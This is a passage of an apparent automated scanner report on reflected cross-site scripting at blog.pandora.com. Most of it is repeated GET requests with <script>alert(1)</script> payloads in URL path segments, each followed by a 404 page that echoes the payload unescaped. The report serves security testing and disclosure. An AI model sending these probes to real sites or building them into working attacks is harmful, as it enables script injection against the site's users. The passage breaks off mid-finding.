This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /faq/index.xmld7f75<script>alert(1)</script>8dac30374f8 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:33 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 337


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /faq/index.xmld7f75<script>alert(1)</script>8dac30374f8 was not found on this server.</p>
...[SNIP]...

3.19. http://blog.pandora.com/jobs [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /jobs

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1bab7<script>alert(1)</script>a6fd1a47986 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jobs1bab7<script>alert(1)</script>a6fd1a47986 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 328


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /jobs1bab7<script>alert(1)</script>a6fd1a47986 was not found on this server.</p>
...[SNIP]...

3.20. http://blog.pandora.com/pandora/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8a2e2<script>alert(1)</script>bf577de6d6e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora8a2e2<script>alert(1)</script>bf577de6d6e/ HTTP/1.1
Host: blog.pandora.com
Proxy-Connection: keep-alive
Referer: http://blog.pandora.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 332


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8a2e2<script>alert(1)</script>bf577de6d6e/ was not found on this server.</p>
...[SNIP]...

3.21. http://blog.pandora.com/pandora/archives/2005/07/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/07/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 95a59<script>alert(1)</script>8e7980713e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora95a59<script>alert(1)</script>8e7980713e3/archives/2005/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora95a59<script>alert(1)</script>8e7980713e3/archives/2005/07/ was not found on this server.</p>
...[SNIP]...

3.22. http://blog.pandora.com/pandora/archives/2005/07/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/07/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4a534<script>alert(1)</script>8a298db320 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives4a534<script>alert(1)</script>8a298db320/2005/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:29 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives4a534<script>alert(1)</script>8a298db320/2005/07/ was not found on this server.</p>
...[SNIP]...

3.23. http://blog.pandora.com/pandora/archives/2005/07/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/07/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8b191<script>alert(1)</script>638b7d947db was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20058b191<script>alert(1)</script>638b7d947db/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20058b191<script>alert(1)</script>638b7d947db/07/ was not found on this server.</p>
...[SNIP]...

3.24. http://blog.pandora.com/pandora/archives/2005/07/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/07/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6552d<script>alert(1)</script>a04c546c7c1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2005/076552d<script>alert(1)</script>a04c546c7c1/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:35 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2005/076552d<script>alert(1)</script>a04c546c7c1/ was not found on this server.</p>
...[SNIP]...

3.25. http://blog.pandora.com/pandora/archives/2005/08/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/08/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1adf9<script>alert(1)</script>84f161db5a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora1adf9<script>alert(1)</script>84f161db5a2/archives/2005/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:26 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora1adf9<script>alert(1)</script>84f161db5a2/archives/2005/08/ was not found on this server.</p>
...[SNIP]...

3.26. http://blog.pandora.com/pandora/archives/2005/08/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/08/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 55147<script>alert(1)</script>0105bf04052 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives55147<script>alert(1)</script>0105bf04052/2005/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives55147<script>alert(1)</script>0105bf04052/2005/08/ was not found on this server.</p>
...[SNIP]...

3.27. http://blog.pandora.com/pandora/archives/2005/08/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/08/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 79994<script>alert(1)</script>e7a8e90b39f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200579994<script>alert(1)</script>e7a8e90b39f/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200579994<script>alert(1)</script>e7a8e90b39f/08/ was not found on this server.</p>
...[SNIP]...

3.28. http://blog.pandora.com/pandora/archives/2005/08/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/08/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8db7f<script>alert(1)</script>1733790e5e0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2005/088db7f<script>alert(1)</script>1733790e5e0/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2005/088db7f<script>alert(1)</script>1733790e5e0/ was not found on this server.</p>
...[SNIP]...

3.29. http://blog.pandora.com/pandora/archives/2005/09/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/09/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b3b98<script>alert(1)</script>f3dc42bdead was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorab3b98<script>alert(1)</script>f3dc42bdead/archives/2005/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorab3b98<script>alert(1)</script>f3dc42bdead/archives/2005/09/ was not found on this server.</p>
...[SNIP]...

3.30. http://blog.pandora.com/pandora/archives/2005/09/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/09/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9f14e<script>alert(1)</script>8a7f5560974 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives9f14e<script>alert(1)</script>8a7f5560974/2005/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives9f14e<script>alert(1)</script>8a7f5560974/2005/09/ was not found on this server.</p>
...[SNIP]...

3.31. http://blog.pandora.com/pandora/archives/2005/09/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/09/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 85944<script>alert(1)</script>d8b652c75fe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200585944<script>alert(1)</script>d8b652c75fe/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:29 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200585944<script>alert(1)</script>d8b652c75fe/09/ was not found on this server.</p>
...[SNIP]...

3.32. http://blog.pandora.com/pandora/archives/2005/09/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/09/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b19b6<script>alert(1)</script>a2e5dc60e78 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2005/09b19b6<script>alert(1)</script>a2e5dc60e78/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:33 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2005/09b19b6<script>alert(1)</script>a2e5dc60e78/ was not found on this server.</p>
...[SNIP]...

3.33. http://blog.pandora.com/pandora/archives/2005/11/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/11/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 73e85<script>alert(1)</script>ab709179510 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora73e85<script>alert(1)</script>ab709179510/archives/2005/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora73e85<script>alert(1)</script>ab709179510/archives/2005/11/ was not found on this server.</p>
...[SNIP]...

3.34. http://blog.pandora.com/pandora/archives/2005/11/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/11/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 52080<script>alert(1)</script>69601ecbd83 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives52080<script>alert(1)</script>69601ecbd83/2005/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives52080<script>alert(1)</script>69601ecbd83/2005/11/ was not found on this server.</p>
...[SNIP]...

3.35. http://blog.pandora.com/pandora/archives/2005/11/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/11/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f1a55<script>alert(1)</script>2930f5de171 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

